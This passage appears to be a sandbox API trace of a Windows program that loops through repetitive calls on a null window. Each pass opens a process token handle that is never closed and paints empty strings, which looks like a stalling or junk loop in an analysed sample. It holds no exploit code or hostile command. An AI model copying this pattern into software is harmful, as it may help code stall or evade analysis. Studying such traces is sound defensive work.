GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.720] GetTickCount () returned 0x1f056 [0071.725] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.725] SetForegroundWindow (hWnd=0x0) returned 0 [0071.725] BringWindowToTop (hWnd=0x0) returned 0 [0071.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2bc) returned 1 [0071.725] GetTokenInformation (in: TokenHandle=0x2bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.725] GetLastError () returned 0x7a [0071.725] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.725] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.726] WTSFreeMemory (pMemory=0x0) [0071.726] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.726] TextOutW (hdc=0x0, x=364, y=674, lpString="", c=0) returned 1 [0071.726] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.726] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.726] GetTickCount () returned 0x1f066 [0071.727] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.727] SetForegroundWindow (hWnd=0x0) returned 0 [0071.727] BringWindowToTop (hWnd=0x0) returned 0 [0071.727] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2c0) returned 1 [0071.727] GetTokenInformation (in: TokenHandle=0x2c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.727] GetLastError () returned 0x7a [0071.727] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.727] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.727] WTSFreeMemory (pMemory=0x0) [0071.727] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.728] TextOutW (hdc=0x0, x=374, y=699, lpString="", c=0) returned 1 [0071.728] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.728] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.728] GetTickCount () returned 0x1f066 [0071.729] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.730] SetForegroundWindow (hWnd=0x0) returned 0 [0071.730] BringWindowToTop (hWnd=0x0) returned 0 [0071.730] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2c4) returned 1 [0071.730] GetTokenInformation (in: TokenHandle=0x2c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.730] GetLastError () returned 0x7a [0071.730] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.730] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.730] WTSFreeMemory (pMemory=0x0) [0071.730] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.730] TextOutW (hdc=0x0, x=384, y=724, lpString="", c=0) returned 1 [0071.730] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.730] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.730] GetTickCount () returned 0x1f066 [0071.731] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.731] SetForegroundWindow (hWnd=0x0) returned 0 [0071.731] BringWindowToTop (hWnd=0x0) returned 0 [0071.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2c8) returned 1 [0071.731] GetTokenInformation (in: TokenHandle=0x2c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.731] GetLastError () returned 0x7a [0071.731] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.731] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.732] WTSFreeMemory (pMemory=0x0) [0071.732] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.732] TextOutW (hdc=0x0, x=394, y=749, lpString="", c=0) returned 1 [0071.732] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.732] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.732] GetTickCount () returned 0x1f066 [0071.734] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.734] SetForegroundWindow (hWnd=0x0) returned 0 [0071.734] BringWindowToTop (hWnd=0x0) returned 0 [0071.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2cc) returned 1 [0071.734] GetTokenInformation (in: TokenHandle=0x2cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.734] GetLastError () returned 0x7a [0071.734] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.734] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.735] WTSFreeMemory (pMemory=0x0) [0071.735] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.735] TextOutW (hdc=0x0, x=404, y=774, lpString="", c=0) returned 1 [0071.735] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.735] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.735] GetTickCount () returned 0x1f066 [0071.735] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.735] SetForegroundWindow (hWnd=0x0) returned 0 [0071.736] BringWindowToTop (hWnd=0x0) returned 0 [0071.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2d0) returned 1 [0071.736] GetTokenInformation (in: TokenHandle=0x2d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.736] GetLastError () returned 0x7a [0071.736] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.736] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.736] WTSFreeMemory (pMemory=0x0) [0071.736] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.736] TextOutW (hdc=0x0, x=414, y=799, lpString="", c=0) returned 1 [0071.736] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.736] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.736] GetTickCount () returned 0x1f066 [0071.742] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.742] SetForegroundWindow (hWnd=0x0) returned 0 [0071.742] BringWindowToTop (hWnd=0x0) returned 0 [0071.742] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2d4) returned 1 [0071.743] GetTokenInformation (in: TokenHandle=0x2d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.743] GetLastError () returned 0x7a [0071.743] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.743] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.743] WTSFreeMemory (pMemory=0x0) [0071.743] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.743] TextOutW (hdc=0x0, x=424, y=824, lpString="", c=0) returned 1 [0071.743] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.743] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.743] GetTickCount () returned 0x1f075 [0071.744] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.744] SetForegroundWindow (hWnd=0x0) returned 0 [0071.744] BringWindowToTop (hWnd=0x0) returned 0 [0071.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2d8) returned 1 [0071.745] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.745] GetLastError () returned 0x7a [0071.745] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.745] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.745] WTSFreeMemory (pMemory=0x0) [0071.745] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.745] TextOutW (hdc=0x0, x=434, y=849, lpString="", c=0) returned 1 [0071.745] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.745] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.745] GetTickCount () returned 0x1f075 [0071.747] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.747] SetForegroundWindow (hWnd=0x0) returned 0 [0071.747] BringWindowToTop (hWnd=0x0) returned 0 [0071.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2dc) returned 1 [0071.747] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.747] GetLastError () returned 0x7a [0071.747] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.747] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.748] WTSFreeMemory (pMemory=0x0) [0071.748] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.748] TextOutW (hdc=0x0, x=444, y=874, lpString="", c=0) returned 1 [0071.748] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.748] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.748] GetTickCount () returned 0x1f075 [0071.749] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.749] SetForegroundWindow (hWnd=0x0) returned 0 [0071.749] BringWindowToTop (hWnd=0x0) returned 0 [0071.749] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2e0) returned 1 [0071.749] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.749] GetLastError () returned 0x7a [0071.749] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.749] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.750] WTSFreeMemory (pMemory=0x0) [0071.750] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.750] TextOutW (hdc=0x0, x=454, y=899, lpString="", c=0) returned 1 [0071.750] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.750] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.750] GetTickCount () returned 0x1f075 [0071.752] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.752] SetForegroundWindow (hWnd=0x0) returned 0 [0071.752] BringWindowToTop (hWnd=0x0) returned 0 [0071.752] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2e4) returned 1 [0071.752] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.752] GetLastError () returned 0x7a [0071.752] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.752] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.753] WTSFreeMemory (pMemory=0x0) [0071.753] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.755] TextOutW (hdc=0x0, x=464, y=924, lpString="", c=0) returned 1 [0071.755] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.755] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.755] GetTickCount () returned 0x1f085 [0071.758] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.758] SetForegroundWindow (hWnd=0x0) returned 0 [0071.758] BringWindowToTop (hWnd=0x0) returned 0 [0071.758] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2e8) returned 1 [0071.758] GetTokenInformation (in: TokenHandle=0x2e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.758] GetLastError () returned 0x7a [0071.758] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.758] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.758] WTSFreeMemory (pMemory=0x0) [0071.759] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.759] TextOutW (hdc=0x0, x=474, y=949, lpString="", c=0) returned 1 [0071.759] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.759] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.759] GetTickCount () returned 0x1f085 [0071.761] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.761] SetForegroundWindow (hWnd=0x0) returned 0 [0071.761] BringWindowToTop (hWnd=0x0) returned 0 [0071.761] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2ec) returned 1 [0071.761] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.761] GetLastError () returned 0x7a [0071.761] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.761] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.761] WTSFreeMemory (pMemory=0x0) [0071.761] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.761] TextOutW (hdc=0x0, x=484, y=974, lpString="", c=0) returned 1 [0071.761] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.761] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.762] GetTickCount () returned 0x1f085 [0071.762] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.762] SetForegroundWindow (hWnd=0x0) returned 0 [0071.762] BringWindowToTop (hWnd=0x0) returned 0 [0071.763] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2f0) returned 1 [0071.763] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.763] GetLastError () returned 0x7a [0071.763] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.763] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.763] WTSFreeMemory (pMemory=0x0) [0071.763] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.763] TextOutW (hdc=0x0, x=494, y=999, lpString="", c=0) returned 1 [0071.763] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.763] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.763] GetTickCount () returned 0x1f085 [0071.766] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.766] SetForegroundWindow (hWnd=0x0) returned 0 [0071.766] BringWindowToTop (hWnd=0x0) returned 0 [0071.766] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2f4) returned 1 [0071.766] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.766] GetLastError () returned 0x7a [0071.766] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.766] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.767] WTSFreeMemory (pMemory=0x0) [0071.767] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.767] TextOutW (hdc=0x0, x=504, y=1024, lpString="", c=0) returned 1 [0071.767] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.767] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.767] GetTickCount () returned 0x1f085 [0071.768] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.768] SetForegroundWindow (hWnd=0x0) returned 0 [0071.768] BringWindowToTop (hWnd=0x0) returned 0 [0071.768] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2f8) returned 1 [0071.774] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.774] GetLastError () returned 0x7a [0071.774] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.774] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.775] WTSFreeMemory (pMemory=0x0) [0071.775] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.775] TextOutW (hdc=0x0, x=514, y=1049, lpString="", c=0) returned 1 [0071.775] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.775] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.775] GetTickCount () returned 0x1f095 [0071.777] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.777] SetForegroundWindow (hWnd=0x0) returned 0 [0071.777] BringWindowToTop (hWnd=0x0) returned 0 [0071.777] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x2fc) returned 1 [0071.777] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.777] GetLastError () returned 0x7a [0071.778] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.778] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.778] WTSFreeMemory (pMemory=0x0) [0071.778] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.778] TextOutW (hdc=0x0, x=524, y=1074, lpString="", c=0) returned 1 [0071.778] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.778] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.778] GetTickCount () returned 0x1f095 [0071.779] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.779] SetForegroundWindow (hWnd=0x0) returned 0 [0071.780] BringWindowToTop (hWnd=0x0) returned 0 [0071.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x300) returned 1 [0071.780] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.780] GetLastError () returned 0x7a [0071.780] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.780] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.780] WTSFreeMemory (pMemory=0x0) [0071.780] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.780] TextOutW (hdc=0x0, x=534, y=1099, lpString="", c=0) returned 1 [0071.781] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.781] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.781] GetTickCount () returned 0x1f095 [0071.783] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.783] SetForegroundWindow (hWnd=0x0) returned 0 [0071.783] BringWindowToTop (hWnd=0x0) returned 0 [0071.783] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x304) returned 1 [0071.783] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.783] GetLastError () returned 0x7a [0071.783] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.783] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.784] WTSFreeMemory (pMemory=0x0) [0071.784] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.784] TextOutW (hdc=0x0, x=544, y=1124, lpString="", c=0) returned 1 [0071.806] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.806] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.806] GetTickCount () returned 0x1f0b4 [0071.808] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.808] SetForegroundWindow (hWnd=0x0) returned 0 [0071.808] BringWindowToTop (hWnd=0x0) returned 0 [0071.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x308) returned 1 [0071.809] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.809] GetLastError () returned 0x7a [0071.809] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.809] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.809] WTSFreeMemory (pMemory=0x0) [0071.809] BeginPaint (in: 